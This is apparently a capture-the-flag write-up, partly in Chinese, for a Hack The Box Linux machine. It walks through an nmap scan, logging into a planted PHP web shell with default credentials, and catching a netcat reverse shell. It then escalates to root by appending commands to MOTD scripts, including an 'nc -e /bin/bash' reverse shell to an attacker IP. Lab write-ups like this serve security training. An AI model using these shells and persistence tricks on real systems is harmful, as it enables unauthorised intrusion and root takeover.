# Nmap 7.80 scan initiated Mon Mar 23 10:20:21 2020 as: nmap -sC -sV -oN ippsec_scan.txt 10.10.10.181 Nmap scan report for 10.10.10.181 Host is up (0.37s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA) | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA) |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Help us Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Mar 23 10:21:10 2020 -- 1 IP address (1 host up) scanned in 49.24 seconds
Meanwhile, I ran gobuster and dirb But there is anything interesting for me.
Getting User Access
80 HTTP Website
Hint:Some of the best web shells that you might need ;), Google it
Found a Github repo
Test all webshell filename for url
smevk.php webshell works, and username is admin, password is admin.
$ nc -lvvp 4444 listening on [any] 4444 ... 10.10.10.181: inverse host lookup failed: Unknown host connect to [10.10.16.99] from (UNKNOWN) [10.10.10.181] 33430 /bin/sh: 0: can't access tty; job control turned off $ id uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare) $ cd /home/webadmin $ ls -la total 44 drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 . drwxr-xr-x 4 root root 4096 Aug 25 2019 .. -rw------- 1 webadmin webadmin 105 Mar 16 04:03 .bash_history -rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout -rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache drwxrwxr-x 3 webadmin webadmin 4096 Aug 24 2019 .local -rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history -rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh -rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt
在webadmin的主目录主要看两个文件note.txt和.bash_history
1 2 3 4 5 6 7 8 9 10 11 12
$ cat note.txt - sysadmin - I have left a tool to practice Lua. I'm sure you know where to find it. Contact me if you have any question. $ cat .bash_history ls -la sudo -l nano privesc.lua sudo -u sysadmin /home/sysadmin/luvit privesc.lua rm privesc.lua logout
$ cd /etc/update-motd.d/ $ echo "cat /root/root.txt" >> 00-header
主机(这两个步骤衔接要快)
1 2 3 4 5 6 7 8 9 10
$ ssh -i id_rsa webadmin@10.10.10.181 ################################# -------- OWNED BY XH4H --------- - I guess stuff could have been configured better ^^ - ################################# Welcome to Xh4H land
cf6c[---------------------------]aefc
Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2
Get root flag~
另外,还可以在91-release-upgrade写一个reverse shell:
1 2 3 4 5 6 7 8 9
#!/bin/sh /tmp/nc -e /bin/bash 10.10.14.194 2345 # if the current release is under development there won't be a new one if [ "$(lsb_release -sd | cut -d' ' -f4)" = "(development" ]; then exit 0 fi if [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ]; then exec /usr/lib/ubuntu-release-upgrader/release-upgrade-motd fi